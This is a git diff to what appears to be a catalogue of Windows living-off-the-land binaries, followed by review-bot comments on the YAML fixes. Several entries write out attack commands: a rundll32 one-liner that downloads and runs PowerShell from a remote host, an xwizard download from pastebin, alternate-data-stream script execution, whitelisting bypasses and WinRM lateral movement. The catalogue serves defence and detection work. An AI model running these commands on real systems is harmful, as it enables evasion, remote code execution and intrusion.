diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index c3fe1b4..2b84d9e 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: cscript c:\ads\file.txt:script.vbs + - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 714425a..8cf43fd 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\hh.exe - - Path: C:\Windows\SysWOW64\hh.exe + - Path: C:\Windows\hh.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index e28ba10..1ec76d5 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -8,7 +8,7 @@ Commands: Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Usecase: Code execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 969d433..87e70b9 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml 
@@ -8,7 +8,7 @@ Commands: Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute - Privileges: User + Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 07cd750..551c133 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -5,7 +5,7 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: odbcconf -f file.rsp - Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. + Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: User diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3868fd5..b45a3c1 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regedit.exe - - Path: C:\Windows\SysWOW64\regedit.exe + - Path: C:\Windows\regedit.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index bc2aa44..0b0e529 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml 
@@ -8,19 +8,19 @@ Commands: Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL bypass - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regsvcs.exe - - Path: C:\Windows\SysWOW64\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 568f322..59365e9 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet Category: Execute 
diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 47d177f..a8bee1a 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -5,19 +5,19 @@ Author: Lior Adar Created: 2020-02-27 Commands: - Command: vbc.exe /target:exe c:\temp\vbs\run.vb - Description: Binary file used by .NET to compile vb code to .exe + Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Description: Description of the second command - Usecase: A description of the usecase + Description: Binary file used by .NET to compile Visual Basic code to an executable. + Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index b1b8b54..d49557f 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: wscript c:\ads\file.txt:script.vbs + - Command: wscript //e:vbscript c:\ads\file.txt:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 082ce3b..96e5dcc 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml 
@@ -19,7 +19,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. + Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. Usecase: Download file from Internet Category: Download Privileges: User diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 8ee42f4..b015321 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -15,7 +15,7 @@ Commands: Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index ca4dd14..631c1f1 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml 
@@ -10,35 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index bfd4dee..e94f6b2 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml 
@@ -4,7 +4,7 @@ Description: Windows Shell Common Dll Author: Created: 2018-05-25 Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + - Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. Category: Execute diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 85da874..1fdea2a 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 587242c..d5e07b3 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml 
@@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 023d4e7..c108ab3 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
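Review bot: In the Cscript.yml hunk the unchanged Description line still reads `Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).`; fix the `exectute` typo while the entry is being touched. The Description also says nothing about why `//e:vbscript` is now part of the command. A short clause (the `//e` switch selects the script engine explicitly instead of relying on the file extension) would tell readers the switch is required rather than optional, and any detection content keyed on the old command string without the switch should be revisited.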
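Review bot: The Hh.yml hunk replaces two Full_Path entries (`C:\Windows\System32\hh.exe`, `C:\Windows\SysWOW64\hh.exe`) with the single `C:\Windows\hh.exe`, but the change carries no justification; a one-line note in the commit message would let reviewers confirm it. Any rule that keyed on the two old paths will silently stop matching, and the `Detection:` block in the same hunk is still empty, so this is the place to record the path correction. The `OperatingSystem` context line spells `Windows vista` in lower case while Netsh.yml in this same patch uses `Windows Vista`; worth normalizing.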
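Review bot: The Infdefaultinstall.yml hunk raises `Privileges: User` to `Privileges: Admin` without saying why; consumers filter entries on this field, so state which step fails as a standard user. The unchanged Description line in the same hunk reads `from a command in entered into a specially prepared INF file`, which should be `from a command entered into a specially prepared INF file`.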
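Review bot: The Netsh.yml hunk changes `Privileges: User` to `Privileges: Admin` but leaves the Description (`Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called`) untouched, so the entry no longer explains which part of the technique needs elevation. A defender triaging this entry needs to know whether the DLL load itself or only the persistence registration is the privileged step; add a clause to the Description or a line to the commit message.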
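Review bot: The Regedit.yml hunk collapses `C:\Windows\System32\regedit.exe` and `C:\Windows\SysWOW64\regedit.exe` into `C:\Windows\regedit.exe` with no explanation, and the `Detection:` block beneath it stays empty. Detection rules generated from the old Full_Path values will stop matching, so note the correction in the commit message and consider stating the old paths as no longer valid in the entry itself.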
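Review bot: The new Full_Path entries in the Regsvcs.yml hunk, `c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe` and `c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe`, use a `v*` glob, whereas Vbc.yml in the same patch lists concrete directories (`v4.0.30319`, `v3.5`). Tooling that turns Full_Path into exact-match detection rules will not match a wildcard, so either list the concrete version directories or document that Full_Path may contain globs. The drive letter is lower-case `c:` here against `C:` in the other hunks. Lowering both commands from `Privileges: Local Admin` to `Privileges: User` also changes the entry's risk rating and deserves a sentence in the commit message.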
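Review bot: The Rundll32.yml hunk adds only the `)` that closes the `.Run(` call, which is correct, but the command remains a plain (unquoted) YAML scalar containing `"`, `;` and `:` characters. It parses today because no `: ` sequence occurs in it; any future edit that puts a space after a colon will break the file. The other commands in this patch that embed double quotes (CL_LoadAssembly.yml, UtilityFunctions.yml, Winrm.yml) are wrapped in single quotes; do the same here.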
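Review bot: In the Vbc.yml hunk the second command's placeholder text (`Description of the second command`, `A description of the usecase`) is replaced with an exact copy of the first command's Description and Usecase, so the entry still does not say what `-reference:Microsoft.VisualBasic.dll` changes relative to the `/target:exe` form. State the difference (the second form adds an assembly reference) so the two commands are distinguishable. The new `OperatingSystem: Windows 7, Windows 10, Windows 11` also omits Windows 8/8.1, unlike every other hunk in this patch; if that is deliberate, say so.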
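Review bot: The Wscript.yml hunk adds `//e:vbscript` to the ADS command but leaves the Description (`Execute script stored in an alternate data stream`) without a word about the engine switch. Readers and rule authors cannot tell from the entry whether the switch is required, and detection content keyed on the previous command string `wscript c:\ads\file.txt:script.vbs` needs the variant with the switch as well.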
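Review bot: The new Xwizard.yml Description mixes separators and punctuation: `%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1].` uses `/` before `[1]` inside a Windows path and ends with a stray `.`, so it is unclear whether the saved file is named `[1]` or `[1].`. Use backslashes throughout and state the file name explicitly. The cache location is a useful forensic artifact, so consider also recording it under the entry's detection fields rather than only in the Description.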
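Review bot: The Advpack.yml hunk raises the LaunchINFSection command to `Privileges: Admin`, in step with the Infdefaultinstall.yml and Ieadvpack.yml changes in this patch, but none of the three hunks records why. Put the rationale in the commit message so the next person editing any of the INF-based entries keeps them consistent.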
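Review bot: The Ieadvpack.yml hunk replaces the placeholder `Windows, Windows 11 (!!!)` on all five commands, which is good, but it raises only the `LaunchINFSection c:\test.inf,,1,` command to `Privileges: Admin` while the command shown above it in the hunk stays at `User`. That first command line is outside the hunk, so a reviewer cannot confirm the asymmetry is intended; name the reason in the commit message.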
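Review bot: The Shell32.yml hunk makes the DLL argument an explicit path (`c:\path\to\payload.dll`), which removes ambiguity about how the file is located. The `Author:` context line in the same hunk is empty, unlike every other file touched here; fill it in or mark it explicitly unknown.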
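Review bot: The CL_LoadAssembly.yml hunk adds the missing closing `"` of the `-command` string and inserts `-ep bypass`, but the Description (`Proxy execute Managed DLL with PowerShell`) does not say whether the execution-policy override is required for the technique or merely convenient. That matters to consumers of the entry: `-ep bypass` on a command line is a common detection signal, so a defender reading this should know whether it belongs to the minimal command. Add a clause to the Description or Usecase.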
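Review bot: The old Command line in the UtilityFunctions.yml hunk ended in a Unicode right double quotation mark (`”`) instead of `"`, which would have left the `-command` string unterminated when pasted; the replacement fixes it without saying so. Mention it in the commit message, and consider a lint step over the yml tree for non-ASCII quotes, since the same copy-paste error can recur in other entries.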
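Review bot: In the Winrm.yml hunk the single-quoted YAML scalar previously contained a literal `\n` (inside YAML single quotes that is a backslash and an `n`, not a newline), so the two `winrm invoke` calls were fused into one unusable line; replacing it with ` && ` fixes that for cmd.exe. Note that `&&` is a cmd.exe (and PowerShell 7+) operator, not Windows PowerShell 5.1 syntax, so the Description should say the command is meant for cmd.exe or the entry should list the two invocations separately. Raising `Privileges` to `Admin` is consistent with creating a Win32_Service on a remote host, but the rationale belongs in the commit message.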